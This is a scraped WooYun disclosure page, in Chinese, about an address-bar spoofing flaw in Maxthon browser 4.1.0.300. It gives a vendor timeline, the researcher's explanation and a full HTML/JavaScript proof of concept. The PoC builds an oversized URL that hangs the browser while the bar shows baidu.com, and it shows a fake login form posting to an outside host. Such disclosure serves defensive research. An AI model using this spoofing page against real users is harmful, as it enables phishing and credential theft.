遨游浏览器4.1.0.300钓鱼欺诈漏洞 | wooyun-2013-027808| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-027808

漏洞标题：遨游浏览器4.1.0.300钓鱼欺诈漏洞

漏洞作者： blast

提交时间：2013-07-05 09:18

修复时间：2013-09-30 09:18

公开时间：2013-09-30 09:18

漏洞类型：设计错误/逻辑缺陷

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2013-07-05：细节已通知厂商并且等待厂商处理中
2013-07-10：厂商主动忽略漏洞，细节向第三方安全合作伙伴开放
2013-09-03：细节向核心白帽子及相关领域专家公开
2013-09-13：细节向普通白帽子公开
2013-09-23：细节向实习白帽子公开
2013-09-30：细节向公众公开

简要描述：

利用拒绝服务给函数造成的死锁可以伪造任意网站，一种是非常卡，无限时间；还有一种不卡的，有60秒的时间可以显示伪造页面（60秒后软件的超时检测机制会替换网页内容导致失效，但是足以骗到用户的帐号密码了），见详细说明

详细说明：

浏览器执行逻辑，猜的
1=》打开页面之后，window.location.href变化，或者window.location.replace改变了window.location
2=》浏览器检测到window.location变化的事件，修改地址栏为新的window.location
3=》发送请求到新的window.location，但是window.location太长，导致dll MxResMgr.dll函数失去响应，但是主程序依旧显示出了网页内容（2，3造成了内容欺骗）
4=》此时发出改变window.location的请求发生阻塞，如果window.location不变化，60秒后没有监听到服务器返回的代码，另外一个函数就会显示“页面请求超时”
5=》大约120秒后浏览器崩溃，拒绝服务

漏洞证明：

打开以下页面，伪造成功执行

?<html>
<head>
  <h1>请在此输入你的帐号和密码</h1>
  <form action="http://luc.pw/test.php" method="post">
    username:<input type="text" id="u">
    <br/>pw:<input type="text" id="p">
    <input type="submit" id="s">
  </form>
  
<script type="text/javascript">
  
function mul(str,count){
    if(count==0) return '';
    var binaryCount = count.toString(2);
    var numDegree = binaryCount.length;
    var resultStr='';
    for(var i=0; i<numDegree; i++){
        resultStr+=resultStr;
        if(binaryCount.charAt(i) == '1'){
            resultStr+=str;
        }
    }
    return resultStr;
}
  
var junka = "baidu.com/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
  
var junk = mul(junka,50000);
//function x(){
window.location.href = "http://" + junk;
//window.location.replace("http://" + junk);
//}
//setInterval("x()",8000);  //<-这样会一直不崩溃，但是会
//非常卡，去掉这句之后页面不卡，大约60秒的时间后出现“无法
//连接到网站”，这应该是其他模块检测超时导致的
</script>
</head>
<body>
  
</body>
</html>

修复方案：

丢弃过长的请求，或者把步骤（2）放在页面加载完成之后再执行

版权声明：转载请注明来源 blast@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2013-09-30 09:18

厂商回复：

漏洞评价：

2013-07-05 09:43 | blast ( 普通白帽子 | Rank:348 漏洞数:57 | 五仁委员会)

orz 厂商名字打错了= = @傲游
2013-07-10 10:46 | blast ( 普通白帽子 | Rank:348 漏洞数:57 | 五仁委员会)

这是..时间过了自动忽略的节奏＝＝？

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-027808

漏洞标题：遨游浏览器4.1.0.300钓鱼欺诈漏洞

相关厂商：傲游

漏洞作者： blast

提交时间：2013-07-05 09:18

修复时间：2013-09-30 09:18

公开时间：2013-09-30 09:18

漏洞类型：设计错误/逻辑缺陷

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 blast@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-027808

漏洞标题：遨游浏览器4.1.0.300钓鱼欺诈漏洞

相关厂商：傲游

漏洞作者： blast

提交时间：2013-07-05 09:18

修复时间：2013-09-30 09:18

公开时间：2013-09-30 09:18

漏洞类型：设计错误/逻辑缺陷

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2013-027808"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 blast@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：